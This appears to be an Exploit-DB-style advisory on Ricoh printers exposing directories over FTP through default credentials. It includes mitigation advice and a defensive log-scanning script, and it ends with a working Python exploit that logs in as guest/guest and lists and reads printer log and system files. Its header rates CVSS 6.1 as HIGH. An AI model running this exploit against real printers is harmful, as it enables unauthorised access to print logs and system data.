Vendor: Ricoh Printers
By: Thomas Heverin
CVSS: 6.1 HIGH
Directory and File Exposure
CWE: 200
Product Name: Ricoh Printers
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE: h:ricoh:printers
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

Ricoh Printer Directory and File Exposure

The exploit allows an attacker to connect to a Ricoh printer over FTP using default credentials and access directories such as Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics), and Syslog (System Log). The attacker can list files and directories, read files, and potentially extract sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to change the default credentials on Ricoh printers and restrict access to FTP services. Regularly monitoring FTP connections and reviewing access logs can also help detect unauthorized access.
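
One way to act on the monitoring advice above, as an added example that is not part of the original advisory or the exploit author's code: it scans firewall flow records for allowed FTP (TCP/21) sessions to printers from hosts outside an allowlist. The key=value log format, the printer subnet 10.0.9.0/24 and the allowlisted print server 10.0.1.10 are assumptions, and the sample records are constructed.

```python
import ipaddress
from collections import defaultdict

# Assumed site data (hypothetical): printer subnet and hosts allowed to use printer FTP.
PRINTER_NET = ipaddress.ip_network("10.0.9.0/24")
FTP_ALLOWED_SOURCES = {ipaddress.ip_address("10.0.1.10")}  # e.g. the print server

# Constructed sample records in an assumed key=value firewall log format.
SAMPLE_LOG = """\
2023-09-15T10:02:11Z src=10.0.1.10 dst=10.0.9.40 dport=21 proto=tcp action=allow
2023-09-15T10:05:42Z src=10.0.5.23 dst=10.0.9.40 dport=21 proto=tcp action=allow
2023-09-15T10:05:50Z src=10.0.5.23 dst=10.0.9.41 dport=21 proto=tcp action=allow
2023-09-15T10:06:03Z src=10.0.5.23 dst=10.0.9.41 dport=9100 proto=tcp action=allow
2023-09-15T10:07:19Z src=10.0.7.77 dst=10.0.9.40 dport=21 proto=tcp action=deny
malformed line without fields
"""

def parse_record(line):
    """Return (timestamp, fields) or None when the line lacks the expected fields."""
    parts = line.split()
    if len(parts) < 2:
        return None
    fields = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
    if not {"src", "dst", "dport", "proto", "action"} <= fields.keys():
        return None
    return parts[0], fields

def unexpected_ftp(log_text):
    """Map each non-allowlisted source to the printers it reached on TCP/21."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        ts, f = rec
        try:
            src, dst = ipaddress.ip_address(f["src"]), ipaddress.ip_address(f["dst"])
        except ValueError:
            continue  # skip records with unparseable addresses
        if (f["proto"] == "tcp" and f["dport"] == "21" and f["action"] == "allow"
                and dst in PRINTER_NET and src not in FTP_ALLOWED_SOURCES):
            hits[str(src)].append((ts, str(dst)))
    return dict(hits)

if __name__ == "__main__":
    for src, events in unexpected_ftp(SAMPLE_LOG).items():
        print(f"{src}: {len(events)} FTP session(s) to printers -> {events}")
```

A source that appears against several printers in a short window, as 10.0.5.23 does in the sample, is the pattern worth reviewing first.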

Exploit-DB raw data:

#Exploit Title: Ricoh Printer Directory and File Exposure 
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A 

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
    try:
        ftp = FTP(ip)
        ftp.login("guest", "guest")
        print(f"Connected to {ip} over FTP as 'guest'")
        return ftp
    except Exception as e:
        print(f"Failed to connect to {ip} over FTP: {e}")
        return None

if __name__ == "__main__":
    target_ip = input("Enter the Ricoh Printer IP address: ")
    
    ftp_connection = ftp_connect(target_ip)
    if ftp_connection:
        try:
            while True:
                file_list = ftp_connection.nlst()
                print("List of Ricoh printer files and directories:")
                for index, item in enumerate(file_list, start=1):
                    print(f"{index}. {item}")
                
                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
                if file_index < 0:
                    break
                
                if 0 <= file_index < len(file_list):
                    selected_file = file_list[file_index]
                    lines = []
                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
                    print(f"Contents of '{selected_file}':")
                    for line in lines:
                        print(line)
                else:
                    print("Invalid file index.")
        except Exception as e:
            print(f"Failed to perform operation: {e}")
        finally:
            ftp_connection.quit()